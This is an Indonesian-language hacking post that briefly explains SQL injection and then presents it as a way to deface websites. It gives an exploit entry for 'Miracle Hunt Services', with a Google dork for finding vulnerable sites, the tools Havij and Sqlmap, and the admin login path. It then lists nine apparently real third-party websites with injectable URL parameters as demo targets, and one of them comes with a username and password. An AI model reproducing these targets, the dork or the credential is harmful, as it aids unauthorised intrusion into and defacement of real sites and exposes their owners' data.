SQL injection adalah teknik hacking dalam keamanan komputer mana seorang penyerang bisa mendapatkan akses ke database dalam sistem dengan menyisipkan karakter khusus. Bisa mengatakan bahwa web target dapat terinfeksi, Anda perlu memasukkan karakter seperti (') atau tanda ganda minus (-) yang tidak dikenal dalam database mysql. Setelah berjalan di database, perintah dapat mengubah, menghapus, atau mengungkapkan data sensitif yang lebih buruk yang bisa mematikan database itu sendiri.
Penyebab terjadinya SQL Injection
- Tidak adanya penanganan karakter tanda petik satu ' dan juga karakter double minus - -.
- Jadi seorang attacker dapat menyisipkan perintah SQL ke dalam parameter atau Form.
Berikut ini adalah salah satu cara deface menggunakan teknik SQL Injection dengan menggunakan dork google.
Exploit Title : Miracle Hunt Services SQL Injection
Dork : "Powered by : Miracle Hunt Services"
Author : Magelang1337
Test : Havij / Sqlmap
Admin : Site.com/admin
Demo :
http://www.zedkitchen.com/service_details.php?id=7 | Username : info@ | Pass : zkit@101
http://www.sovereignenterprise.in/service-detail.php?serv=11
http://www.rajhanselectric.com/products.php?pro_subcat_hdr=69
http://sparkzelectro.com/service.php?sid=25
http://www.razzledazzlejewels.net/product.php?id=2
http://www.digmanibedcollege.in/faculty.php?fpageid=1
http://jaiclasses.com/course_detail.php?id=3
http://devbhoomipharmaceuticals.com/products.php?data=7
http://shalengineers.in/product.php?id=129